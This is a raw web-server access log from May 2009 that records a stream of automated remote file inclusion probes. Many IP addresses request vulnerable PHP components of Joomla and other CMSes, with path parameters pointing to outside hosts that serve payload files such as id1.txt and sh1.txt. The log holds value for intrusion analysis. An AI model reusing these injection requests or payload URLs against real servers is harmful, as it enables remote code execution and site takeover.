83.103.72.130 - - [31/May/2009:14:50:27 -0400] "GET /log/sdaglobal.org-access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 364
83.103.72.130 - - [31/May/2009:14:50:58 -0400] "GET /log/sdaglobal.org-access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 364
69.94.125.100 - - [31/May/2009:14:53:03 -0400] "GET /log/sdaglobal.org-access_log//Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 334
74.208.111.178 - - [31/May/2009:15:02:42 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
74.208.111.178 - - [31/May/2009:15:02:42 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 314
74.208.111.178 - - [31/May/2009:15:02:42 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343
69.237.82.158 - - [31/May/2009:15:02:55 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 310
69.237.82.158 - - [31/May/2009:15:02:55 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 314
69.237.82.158 - - [31/May/2009:15:02:55 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 343
65.55.209.4 - - [31/May/2009:15:03:08 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.209.4 - - [31/May/2009:15:03:09 -0400] "GET /log/fable.hitechemall.com-error_log.1 HTTP/1.1" 200 22781
69.50.197.106 - - [31/May/2009:15:03:47 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343
69.50.197.106 - - [31/May/2009:15:03:47 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 314
69.50.197.106 - - [31/May/2009:15:03:47 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
110.45.144.106 - - [31/May/2009:15:03:51 -0400] "GET //include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 305
110.45.144.106 - - [31/May/2009:15:03:51 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 334
110.45.144.106 - - [31/May/2009:15:03:51 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 309
69.50.197.106 - - [31/May/2009:15:04:07 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 314
69.50.197.106 - - [31/May/2009:15:04:07 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
69.50.197.106 - - [31/May/2009:15:04:07 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343
69.237.82.158 - - [31/May/2009:15:05:57 -0400] "GET /log/sdaglobal.org-access_log.4//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 341
81.223.126.82 - - [31/May/2009:15:06:32 -0400] "GET /log/sdaglobal.org-error_log.1/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 331
81.223.126.82 - - [31/May/2009:15:06:32 -0400] "GET /xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 301
81.223.126.82 - - [31/May/2009:15:06:32 -0400] "GET /log/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 305
110.45.144.106 - - [31/May/2009:15:06:54 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 339
110.45.144.106 - - [31/May/2009:15:06:55 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 308
110.45.144.106 - - [31/May/2009:15:06:55 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 312
110.45.144.106 - - [31/May/2009:15:07:20 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 336
110.45.144.106 - - [31/May/2009:15:07:57 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 308
65.55.106.135 - - [31/May/2009:15:08:10 -0400] "GET /log/auccf.sdaglobal.org-error_log HTTP/1.1" 200 309
81.223.126.82 - - [31/May/2009:15:08:26 -0400] "GET /log/sdaglobal.org-access_log.4/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 332
69.94.125.100 - - [31/May/2009:15:09:08 -0400] "GET /log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 315
69.94.125.100 - - [31/May/2009:15:09:08 -0400] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 311
69.94.125.100 - - [31/May/2009:15:09:21 -0400] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 311
69.94.125.100 - - [31/May/2009:15:09:21 -0400] "GET /log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 315
110.45.144.106 - - [31/May/2009:15:12:52 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_cpg/cpg.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 339
69.50.197.106 - - [31/May/2009:15:15:53 -0400] "GET /log/sdaglobal.org-access_log.4//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 341
69.50.197.106 - - [31/May/2009:15:16:21 -0400] "GET /log/sdaglobal.org-access_log.4//modules/xfsection/modify.php?dir_module=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:19:20 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:19:20 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:19:20 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:19:22 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:19:22 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:19:23 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:19:24 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:19:25 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:19:25 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:19:27 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:19:27 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:19:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:20:38 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:20:38 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:20:39 -0400] "GET /log/sdaglobal.org-access_log.1/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 339
85.214.83.196 - - [31/May/2009:15:20:45 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:20:45 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:20:45 -0400] "GET /log/sdaglobal.org-access_log.1/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 339
85.214.83.196 - - [31/May/2009:15:20:59 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:20:59 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:22:04 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:22:05 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
110.45.144.106 - - [31/May/2009:15:23:27 -0400] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 358
110.45.144.106 - - [31/May/2009:15:23:27 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 354
110.45.144.106 - - [31/May/2009:15:23:27 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 383
110.45.144.106 - - [31/May/2009:15:23:31 -0400] "GET /log/sdaglobal.org-access_log.4/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 385
85.214.83.196 - - [31/May/2009:15:24:38 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:24:38 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:24:40 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
64.34.181.87 - - [31/May/2009:15:24:42 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 319
64.34.181.87 - - [31/May/2009:15:24:42 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 352
64.34.181.87 - - [31/May/2009:15:24:42 -0400] "GET /log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 323
85.214.83.196 - - [31/May/2009:15:24:54 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:24:54 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:24:55 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:24:57 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:24:57 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:24:57 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
85.214.83.196 - - [31/May/2009:15:25:04 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 308
85.214.83.196 - - [31/May/2009:15:25:04 -0400] "GET /log/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 312
85.214.83.196 - - [31/May/2009:15:25:04 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 341
64.34.181.87 - - [31/May/2009:15:25:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 352
212.100.229.207 - - [31/May/2009:15:27:04 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 352
212.100.229.207 - - [31/May/2009:15:27:04 -0400] "GET /log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 323
212.100.229.207 - - [31/May/2009:15:27:04 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 319
212.100.229.207 - - [31/May/2009:15:27:14 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 352
211.110.19.178 - - [31/May/2009:15:29:03 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:15:29:03 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 331
211.110.19.178 - - [31/May/2009:15:29:03 -0400] "GET /config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 302
211.110.19.178 - - [31/May/2009:15:29:05 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:15:29:06 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 331
211.110.19.178 - - [31/May/2009:15:29:06 -0400] "GET /config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 302
211.110.19.178 - - [31/May/2009:15:29:11 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:15:29:11 -0400] "GET /config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 302
211.110.19.178 - - [31/May/2009:15:29:11 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 331
211.110.19.178 - - [31/May/2009:15:29:11 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 331
211.110.19.178 - - [31/May/2009:15:29:11 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:15:29:11 -0400] "GET /config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 302
211.110.19.178 - - [31/May/2009:15:29:12 -0400] "GET /log/sdaglobal.org-error_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 330
211.110.19.178 - - [31/May/2009:15:29:13 -0400] "GET /log/sdaglobal.org-error_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 330
211.110.19.178 - - [31/May/2009:15:29:14 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 331
211.110.19.178 - - [31/May/2009:15:29:14 -0400] "GET /config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 302
211.110.19.178 - - [31/May/2009:15:29:14 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:15:29:17 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 331
211.110.19.178 - - [31/May/2009:15:29:17 -0400] "GET /config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 302
211.110.19.178 - - [31/May/2009:15:29:17 -0400] "GET /log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
216.17.99.13 - - [31/May/2009:15:30:20 -0400] "GET /?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 9432
216.17.99.13 - - [31/May/2009:15:30:20 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 312
216.17.99.13 - - [31/May/2009:15:30:20 -0400] "GET /log/sdaglobal.org-access_log.4/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 312
216.17.99.13 - - [31/May/2009:15:30:20 -0400] "GET /log/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 58358
89.186.1.54 - - [31/May/2009:15:30:51 -0400] "GET /?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 9432
89.186.1.54 - - [31/May/2009:15:30:51 -0400] "GET /log/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 58358
89.186.1.54 - - [31/May/2009:15:31:00 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 312
89.186.1.54 - - [31/May/2009:15:31:00 -0400] "GET /log/sdaglobal.org-access_log.4/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 312
216.17.99.13 - - [31/May/2009:15:31:04 -0400] "GET /?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 9432
216.17.99.13 - - [31/May/2009:15:31:04 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 314
216.17.99.13 - - [31/May/2009:15:31:04 -0400] "GET /log/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 58358
211.110.19.178 - - [31/May/2009:15:31:08 -0400] "GET /log/sdaglobal.org-access_log.3/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 333
211.110.19.178 - - [31/May/2009:15:31:10 -0400] "GET /log/sdaglobal.org-access_log.3/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 333
216.17.99.13 - - [31/May/2009:15:31:10 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 314
211.110.19.178 - - [31/May/2009:15:31:10 -0400] "GET /log/sdaglobal.org-error_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 330
211.110.19.178 - - [31/May/2009:15:31:12 -0400] "GET /log/sdaglobal.org-error_log/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 330
85.214.83.196 - - [31/May/2009:15:31:13 -0400] "GET /log/sdaglobal.org-access_log.1/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 339
89.186.1.54 - - [31/May/2009:15:31:28 -0400] "GET /?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 9432
89.186.1.54 - - [31/May/2009:15:31:29 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 314
89.186.1.54 - - [31/May/2009:15:31:28 -0400] "GET /log/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 58358
89.186.1.54 - - [31/May/2009:15:31:31 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 312
89.186.1.54 - - [31/May/2009:15:31:31 -0400] "GET /?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 9432
89.186.1.54 - - [31/May/2009:15:31:31 -0400] "GET /log/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 200 58358
89.186.1.54 - - [31/May/2009:15:31:38 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?sourcedir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 314
216.17.99.13 - - [31/May/2009:15:32:31 -0400] "GET /?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 9432
216.17.99.13 - - [31/May/2009:15:32:31 -0400] "GET /log/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 58358
216.17.99.13 - - [31/May/2009:15:32:35 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 312
216.17.99.13 - - [31/May/2009:15:32:35 -0400] "GET /log/sdaglobal.org-access_log.4/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 312
211.110.19.178 - - [31/May/2009:15:34:01 -0400] "GET /log/sdaglobal.org-access_log.3%20/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 334
211.110.19.178 - - [31/May/2009:15:34:14 -0400] "GET /log/sdaglobal.org-access_log.3%20/config/dbutil.bck.php?confdir=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 334
110.45.144.106 - - [31/May/2009:15:35:51 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 369
110.45.144.106 - - [31/May/2009:15:35:52 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 338
110.45.144.106 - - [31/May/2009:15:35:53 -0400] "GET /log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 342
213.246.62.35 - - [31/May/2009:15:37:24 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 320
213.246.62.35 - - [31/May/2009:15:37:25 -0400] "GET /log//login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 295
213.246.62.35 - - [31/May/2009:15:37:25 -0400] "GET //login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 291
213.246.62.35 - - [31/May/2009:15:37:57 -0400] "GET //login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 291
213.246.62.35 - - [31/May/2009:15:37:57 -0400] "GET /log//login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 295
213.246.62.35 - - [31/May/2009:15:38:00 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 320
110.45.144.106 - - [31/May/2009:15:39:18 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 354
110.45.144.106 - - [31/May/2009:15:39:18 -0400] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 358
110.45.144.106 - - [31/May/2009:15:39:18 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 383
110.45.144.106 - - [31/May/2009:15:39:20 -0400] "GET /log/sdaglobal.org-access_log.4/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 385
85.214.83.196 - - [31/May/2009:15:39:34 -0400] "GET /log/sdaglobal.org-access_log.1/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 339
